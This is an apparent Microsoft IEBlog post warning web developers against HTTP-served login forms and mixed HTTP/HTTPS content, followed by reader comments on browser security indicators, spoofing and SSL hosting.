TLS and SSL in the real world


Quite a bit has been written about the Secure Sockets Layer (SSL) protocol and its successor Transport Layer Security (TLS), so I won’t cover the protocols in detail here.  The following are good references if you want to get a quick refresher.

Happily, a majority of web users now know to look for the lock icon and the HTTPS in the address line to identify when their connection is secure.  Unfortunately, relatively few users understand what security guarantees these protocols provide.  Fewer still understand the critical importance of digital certificates to secure connections.  In a recent phishing attack, the bad guy used a third-party SSL-hosting server to display the lock icon for his fake banking site.  Was the connection secure?  Sure.  Was it safe?  Of course not. 

Improving the user-experience around TLS/SSL is a significant challenge: how much can we help the user stay safe without having to explain all this mumbo-jumbo?  Or should we  try to explain public key cryptography, symmetric key exchange, digital certificates, the role of certification authorities, and more? 

All the average user wants to know is: “Will my transaction be safe?”

Here we run into Law of Security #10— Technology is not a panacea, and TLS/SSL alone can’t answer the user’s question. 

It’s easy to fall into the trap of assuming that spoofing fraud only occurs on the web, but there are plenty of “real-world” attacks that work essentially the same way.  Examples range from a cashier using a hacked terminal to swipe your credit card, to the ambitious crooks who deployed a phony ATM in a shopping mall to collect card numbers and PIN codes.  When was the last time you looked at your ATM and asked it for some ID?

Just because there are no simple solutions doesn’t mean we’re not working hard on making surfing more Trustworthy, and TLS/SSL will be a part of that.   We’re doing some interesting work here, which I’ll be able to blog about at a later date. 

For now, I’d like to point out that security is only as strong as its weakest link.  To that end, I want to highlight two very common web-developer mistakes when building TLS/SSL web applications.

Critical Mistake #1: Non-HTTPS Login pages (even if submitting to a HTTPS page).

Most webdevs know that HTTPS is comparatively expensive– the multistage handshake with multiple roundtrips and cryptographic operations is inherently less performant than straight HTTP.  A few years ago, someone got the bright idea that login pages should be served via HTTP to reduce this performance hit. 

The thinking goes something like: “Well, since the HTTP POST containing the user’s credentials is sent via HTTPS, any man-in-the-middle can’t see the data.” 

And this seemed like a reasonable idea.  The practice became even more popular as banks and credit card companies decided that customers should be able to log in directly from the HTTP-delivered homepage.  Three of my financial institutions offer this “convenience”.  One of them even draws little lock icons near the login box and provides a phone number for customers to call so they can convince them that it’s safe.

There are two problems with this practice: One fairly obvious, and one slightly less obvious.  The first problem is simple: How does the user know that the form is being submitted via HTTPS?  Most browsers have no such UI cue.  (Pretty much everyone turns off the “Warn when sending unencrypted form data” option within 2 minutes of installing the browser.)  Even supposing there was a UI cue that the form was targeted at a HTTPS page, how could the user know that it was going to the right HTTPS page?  If the login form was delivered via HTTP, there’s no guarantee it hasn’t been changed between the server and the client.  A bad guy sitting on the wire between the two could simply retarget the POST to submit to a HTTPS site that he controls.  Oops. 

Think that’s bad?  There’s an even more sneaky attack the bad guy could execute.  The event model in HTML is pretty rich, and one of the things it can do is listen for keystroke events.  So, the bad guy could simply rewrite the login page HTML to leak keystrokes to a server he controls, every time a key is pressed.  Unsecured login form + Man-in-the-Middle+ 5 lines of JScript + Serverside keystroke collector = Bad News.  

(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)

Critical Mistake #2: Mixing HTTP Content into a HTTPS page

Some HTTPS pages pull in assorted resources over HTTP, which leads to the annoying “This page contains both secure and nonsecure items” prompt.  Why does this hassle exist?  Is it really so bad if some files get pulled down via HTTP, if the main body of my page is delivered via HTTPS?

The answer is, of course, yes, this is a bad thing.  For one thing, it’s impossible for the user to tell what parts of the page were delivered securely, and what parts were not.  And worse, if a man-in-the-middle can rewrite the HTTP traffic, he can, for instance, rewrite the HTTPS page using standard DHTML.  Or, he can scan the page for any information of interest (e.g. a credit card number) and POST that data to a server he controls.  Using HTTP-delivered resources on a HTTPS-delivered page pokes holes in your secure channel.  Don’t do it.

What can we do today?

I hope you will join me in calling on operators of insecure HTTPS sites to correct these mistakes. 

In the short term, you may be able to work around these security holes:

  • If available, a “Login securely” link might lead to get to an HTTPS login form you can use instead of the form on a HTTP page.  Or try visiting the https:// version of the site directly.
  • If prompted to download mixed content, always choose “No”.

Thought for the week

The so-called “browser wars” have fundamentally changed.  It’s no longer Microsoft vs. Mozilla vs. Opera et all.  Now it’s the “good guys” vs. the “bad guys.”  The “bad guys” are the phishers, malware distributors, and other miscellaneous crooks looking for a quick score at the expense of the browsing public. 

We’re all in this together.

-Eric Lawrence

edit: refer to the blog post titled: SSL, TLS and a little Active X: How IE7 Strikes a Balance Between Security and Compatiblity for updated behavior


Comments (47)

  1. Anonymous says:

    Great article. It is a shame that there is little protection for the novice internet user against phishing whatever browser they are using; especially with the social scams such as use of international domain names to spoof proper domains.

  2. brantgurga says:

    What are some examples of browsers you are referencing with your food for thought? The only browsers I know that run JavaScript in the UI are Mozilla-derivatives and there was an issue along those lines disclosed recently that affects them, but such issues I found are reportedly fixed in the latest Firefox release.

  3. Anonymous says:

    Great article is this.

    Thankfully, my bank was offering the ‘convenient’ way to login but then they replaced the login form with a big button which takes you to secure login page. I hope more banks and sites will follow.

    I think it would be nice if this article was published on MSDN. So that a developer working for a bank website can go to Manager and show that Microsoft recommends not to have login form on non secure page. [Ofcourse this is for the managers who don’t have clue… and they are in majority! :(]

    JD

  4. Anonymous says:

    "The first problem is simple: How does the user know that the form is being submitted via HTTPS? Most browsers have no such UI cue."

    The alert box is disabled because it is intrustive and gets in the user’s way even for legitimate submissions. What if the UI cue was to change the actual submit button in some way? It could include a lock icon or be colored yellow while still using the OS-style instead of the roll-your-own-style button? These UI clues for https forms would be helpful and not get in the way of either type of transaction, they would merely inform and let the user make the call.

  5. Anonymous says:

    One of the features I like most about Opera is that on a SSL secured site it displays the company name that owns the SSL certificate in the address bar so you can tell if it is who it should be. And it’s unobtrusive.

  6. Anonymous says:

    "(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)"

    How is that different from a browser helper object in IE which of course has access to DHTML events?

  7. Anonymous says:

    Chris Griego,

    Because such visual cues as you describe inside the content area of the browser can be easily spoofed.

  8. Anonymous says:

    Nice article, you brought up some points I hadn’t really thought about before, namely the fact that a form that’s being sent unsecured to a client could be modified by a man-in-the-middle attack.

    However, if I was the attacker, and I was able to perform a man-in-the-middle attack on requests between the client and server, I would take advantage of the fact that most users just type "www.mybank.com" into their browser instead of the full "https://www.mybank.com". So right there, since the initial request is unsecured, I’d just modify the link to the secured login page and point it somewhere else… like to my own ‘secured login page’, which is similar to the point you made about modifying an unsecured form POST target.

  9. Anonymous says:

    <<How is that different from a browser helper object in IE which of course has access to DHTML events?>>

    It’s essentially no different at all.

    The general point is that enabling powerful browser extensions without introducing privacy/security holes is hard– Regardless of whether or not you’re using native code or script.

  10. Anonymous says:

    You said: ‘Happily, a majority of web users now know to look for the lock icon and the HTTPS in the address line to identify when their connection is secure.’

    You say a majority of users but I don’t believe this. The majority of users that I see in my line of work as IT administrator do not have a clue. In all I deal with about 200-250 people from work, friends and family, and only about 7 of those could be classed as ‘Masters of the web’, being able to surf with the confidence of not being defrauded or catching a virus. The majority of the people are beginners, or blind-surfers. They just open up the browser and surf. They do not have a clue. My colleague and I are slowly teaching them but it is a slooowww process. Out of everybody I would only say about a 1/4 (quarter) would know how to identify a secure page.

  11. Anonymous says:

    Critical Mistake #1: Non-HTTPS Login pages (even if submitting to a HTTPS page).

    You’re absolutely correct.

    Why are there plenty of such pages to login to Passport used on the MSN site then ?

  12. Anonymous says:

    Eric, this is a very useful and informitive article! More like this please…

  13. Anonymous says:

    Nice article, thanks a lot 😉

  14. Anonymous says:

    I found this very informative and interesting.

    Provides some food for thought.

  15. Anonymous says:

    At the end of a post on SSL/TLS and just how much security a &quot;secure&quot; site really gives you, Eric Lawrence of IEBlog posted an interesting thought:

    The so-called &quot;browser wars&quot; have fundamentally changed. It’s no longer Microsoft vs. Mozilla vs. Op…

  16. Anonymous says:

    <<You say a majority of users [know to look for the lock but I don’t believe this.>>

    My statement was a bit ambiguous, so I should clarify.

    In usability testing, when we ask users "Do you think this page secure?", a majority of users do know to look for the lock and/or the HTTPS.

    That doesn’t mean, however, that 50%+ of web users are ~routinely~ looking for the lock as they surf around the web.

    I suspect you’re correct in noting that many many users give no regular thought to the security of their web transactions.

    The percentage who do take note of SSL will probably continue to gradually increase, particularly as more and more news about Internet-based scams make the mainstream press.

  17. Anonymous says:

    Even the passport.net site itself uses an http login page when you click in the login buttons….

  18. Anonymous says:

    IMHO I believe IE should split the "Warn when sending unencrypted form data" into 2 seperate types: non critical Forms that submit data and forms that submit username/password data.

    While theres no perfect way, I would actualy prefer this model as I would allow non essential data to be sent to a non encrypted source, but I never want username/login data sent to a non encrypted source.

    On a side note, what happens if a (hacked) secure page submits data to a non secure source?

    As a coder and off the top of my head, I would categorize a form as essential data if any input name had "user,username,uname,pass,password,passwd" in the input or if the processing url had "login" anywhere in the filename or folder name.

    I know this is a weak model at best, but a weak model is better than no model.

  19. Anonymous says:

    Also I would like to add that I totally disagree that the average user knows to look for the KEY icon in the browser.

    Maybe the average technical user, but I would bet a month’s salary 95% of web users don’t know that the key icon is even there.

    IE needs a stronger visual cue to show that a page is encrypted, and more importantly, a cue that can’t dissappear by going View > Status Bar.

    I can’t give a sane easy answer for this one as anything I can quickly think up is a bit distractive. The best I can come up with, and I’m not even sure if it’s a good idea, is that a form, if encrypted and going to an encrypted url, gets some box around it when the user has focus any of the input boxes, and has a lock icon on a corner of the box.

    Obviously the graphic of this box shouldn’t easily be reproducable via CSS/JS but considering where CSS2/CSS3 is going, pretty much anything is possible now.

  20. Anonymous says:

    "IE needs a stronger visual cue to show that a page is encrypted, and more importantly, a cue that can’t dissappear by going View > Status Bar."

    Exactly what I was going to suggest. Hunting around for that tiny little lock and obscure "s" in https is something even I forget to do, or ignore completely. That said, we don’t need a pop up dialog or anything that would go from one extreme to the other.

  21. Anonymous says:

    If the status bar is a bad idea, how about modify the frame around a web page? Unsecure sites would be normal, but you could have say a red or gold ring around a site that is completely secure. A mixed environment could have a completely different color, like half red half gold to say that part of it is secure, but because it’s mixed the red says stop.

    Of course I don’t know how particularly easy this is, but it should be something that is easy to notice and can’t be taken away by View > Status Bar. I do think that what we have has been sufficient so far, but take it a little step further for those of us not quite as fortunate to remember the umpteen steps we need to make sure a connection is secure. (It’s not umpteen, but it’s definately not one and seems to be getting more complex, not less)

  22. Anonymous says:

    Jeremy: Unfortunately, that’s easily spoofed, with something like:

    body { border: 2px solid red; }

    in your CSS file.

  23. Anonymous says:

    Regarding the "This page contains both secure and nonsecure content":

    If you dynamically push Internet Explorer a PDF as a result of a POST via https, you get this warning (even though the resulting page and everything associated with it is being requested over https).

    Please fix this. The fix you’ve already provided:

    http://support.microsoft.com/?kbid=321532

    requires a web server to send Accept-Ranges: bytes in the header, which isn’t a requirement of HTTP/1.1:

    http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html

    "Origin servers that accept byte-range requests MAY send

    Accept-Ranges: bytes

    but are not required to do so."

    If you really stand behind your article, you would help correct the problem of IE incorrectly showing this message when being sent a PDF file as a result of a POST.

  24. Anonymous says:

    <<If you dynamically push Internet Explorer a PDF as a result of a POST via https, you get this warning >>

    Have you installed the v7.0 PDF reader? I believe this issue was resolved.

  25. Anonymous says:

    Shouldnt there be some kind of indication as to which parts of the page were loaded via non-secure protocol and which over HTTPS when loading mixed content? Something like a red box around a non-secure graphic, or a description of which parts of the page were non-secure in the "information bar" of IE? Most of the times these are innocuous, thirdparty tracking scripts

  26. Anonymous says:

    I wasn’t referring to a section that can be spoofed by CSS. Body refers to what is INSIDE the frame. The frame consists of the toolbar up top, a middle "body" (lack of a better word), and the status bar below. The space in between the status and toolbars would be the ideal real estate with an area that is not affected by CSS or code of any kind. Since the lock isn’t affected by code, this area shouldn’t be as well.

    This makes perfect sense when you think about tabbed browsing. The tab is the body, or what can be changed by CSS. The area around the tab (tab control, I think in Windows controls) would be where you’d put this color so that the border of the tab control would be what changes, not the body, not anything that can be touched by CSS or any markup language.

    Say this was in place and someone did actually try to spoof it. You’d have a red ring with a red ring inside of it. The outter ring would be what matters but I could see someone being confused by that. So I’ll give another suggestion: opacity + color coding. There could be a barely visible background color that changes based upon what type of site it is. Or you could simply have a "watermark" of a lock for completely secure, open lock for mixed, and no lock if it’s not secure.

    You honestly can’t develop something initially that can’t be spoofed by CSS or HTML, it’s just too powerful in the browser. You have to take the bits that you do deem as "locked" out so that no one can spoof them. It’s the nature of HTML as a markup language to allow that kind of flexibility. HTML doesn’t care about what is on the screen it just wants it to be formatted correctly. What is on the screen is the part that is exploited for phishing and other scams to be successful. There’s definately a catch 22 involved, if just a little one.

  27. Anonymous says:

    I don’t buy it. Not that you’re wrong; you’re quite right. The problem is that if we assume the attacker can arbitrariliy get at the http stream and modify it. Assuming that capability, I ask you how the user gets to the https login page…likely from an http page…so that link is vulnerable to rewriting to a different server. For that matter, the user never even gets to your homepage, they go instantly straight to an imposter site.

    This is assuming that the user doesn’t, by themselves, unprompted, type in https://www.yoursite.com. If you link to it anywhere, then there’s a vulnerable link in the chain. And very few businesses are going to accept requriing customers to type in the URL, remembering the https. I’d venture to say none.

    I think it’s safer to just say the whole https security model is nothing but window dressing anyway, so I’d hardly call these peices critical mistakes. It’s too confusing for the casual user to figure out all of this out, so they punt; either by not participating or by not worrying about it. Not sure what the fix is.

  28. Anonymous says:

    <<Something like a red box around a non-secure graphic, or a description of which parts of the page were non-secure in the "information bar" of IE? Most of the times these are innocuous, thirdparty tracking scripts>>

    That’s precisely the point: It’s never innocuous to deliver a script on a HTTPS page via HTTP. Script can completely rewrite the page using the DOM, so it’s not really possible to highlight which part of the page isn’t secure.

  29. Anonymous says:

    "The so-called ‘browser wars’ have undamentally changed… Now it’s the ‘good guys’ vs. the ‘bad guys.’"

    Actually, its always been the ‘good guys’ vs. the ‘bad guys,’ only now Microsoft decided they want to be one of the good guys. We’re still seeing how that’s going to work out, because it seems that <a href="http://www.ivor.it/goog/big1000/">MSN Search favors IIS hosts</a>. If that doesn’t fall under ‘looking for a quick score at the expense of the browsing public’, I don’t know what does. History has shown that Microsoft thinks nothing of poisoning its relationship with the internet community, and that continues to be the case.

  30. Anonymous says:

    With regards to "Mixed content" error:

    It makes sense to display such a warning if a page includes insecure content that may contain damaging client script. That would include <script> <object> and <applet>, perhaps <link> (CSS), and perhaps <frame> and <iframe> (see below).

    It does *NOT* make sense to display such a message for pages that include insecure images <img>. Why would you want to pull a bunch of GIFS and JPEGS thru SSL. That causes completely unecessary server load and client slowness (especially because SSL served images generally won’t get cached).

    Not displaying the error message for insecure <img> URLs is a simple fix.

    Perhaps better than an error message would be to refuse loading the dangerous tags <script> <object> <applet> if not served via SSL (on the same domain).

    Frames <frame> <iframe> can be sandboxed (a feature added to HTA’s in IE 6.0, such that they can’t get access to the containing document.

  31. Anonymous says:

    <<RE: http://www.ivor.it/goog/big1000/>&gt;

    Take that tin-foil hat off, friend. MSN & other engines are all about relevancy. It’s well understood that more … let’s call them "random"… sites are hosted by Apache. There are lots of webhosts with 1000 little vanity sites on a single Apache box.

    The same can be done with IIS, of course, but it’s relatively less common.

  32. Anonymous says:

    I disagree regarding images. An insecure image request could get re-routed to a malicious server, serving up images that trigger various overflow bugs in image loading code (of which there have been at least a few in all browsers), and take control of at least the browser.

    If they are ssl, at least you know they haven’t been tampered with on the way, and the original end point is the server that you looked at the cert for and decided to trust.

  33. Anonymous says:

    > (Pretty much everyone turns off the "Warn when sending unencrypted form data" option within 2 minutes of installing the browser.)

    Well DUH!

    What do you think people do when faced with crappy popups? They close them!

    Why did you build the Information Bar into XP SP2 and do not use it to display important information like this? Instead you use popups and those will be turned of with a reflex.

    IE team should consult Bill Hill regarding popups. He put it real well in the video interview.

  34. Anonymous says:

    You know what would be nice as well?

    It would be nice if you could somehow extend

    the SSL/TLS spec to allow operators to relax

    the need to have unique IP’s for each domain.

    This would allow hosting providers to host

    multiple certificates on a single web server

    IP. (Like non-ssl)

    I mean, is it such a leak that I’m talking to a

    particular host if I have that IP address?

  35. Anonymous says:

    Several people have asked, if we are worried about malicious manipulation of an insecure server response midstream – what is to stop the same person from inserting their own log-in form on any http page on a web site, and capturing a user’s credentials that way? It seems like this is an unlikely occurrence at best, or an unavoidable security hole at worst…

  36. Anonymous says:

    Re: using a single IP for multiple SSL Host, you want Server Name Indication.

    Look at https://sni.corelands.com/ for more info.

  37. Anonymous says:

    Re: secure notification; Firefox, as well as the status bar notification for SSL pages, also colours the address bar and adds a key icon to it. It also places the actual address of the server next to the status-bar key line, so a user can look down and think "Oh wait, that doesn’t say paypal.com" and quickly get out the way.

    This is by far the best solution for this problem I’ve seen, and I’d really like IE7 to introduce something like that.

  38. Anonymous says:

    Online banking websites like Bank of America should use SSL login pages, as non-SSL pages are not secure.

  39. Anonymous says:

    Today, Microsoft released Internet Explorer 7 Beta 2. I recommend you to download it in order to test…

  40. Anonymous says:

    George Ou over at ZDNet has recently been engaged in a &lt;a href=&quot;http://blogs.zdnet.com/Ou/?p=226&quot; target=&quot;_blank&quot;&gt;one-man crusade&lt;/a&gt; against banks that let users log in to their on-line banking services directly from front

  41. Anonymous says:

    IE7 was released yesterday. If you’re a web site owner, developer or designer, and find that your site or application is encountering problems, fret not. Here is a list of resources for you: Read the Checklists Download the IE7 Readiness…

  42. Anonymous says:

    IE7 was released yesterday. If you’re a web site owner, developer or designer, and find that your site or application is encountering problems, fret not. Here is a list of resources for you: 1. Checklists 2. Download the IE7…

  43. Anonymous says:

    From now on, we have to test our web application on another version of browser. Source: http://dotnet.csdn.net/n/20061019/96467.html Microsoft IE7已于今日正式发布。微软在网站上公布了开发者和Web制作人员要注意的一些事项。翻译如下: 确认你的程序中关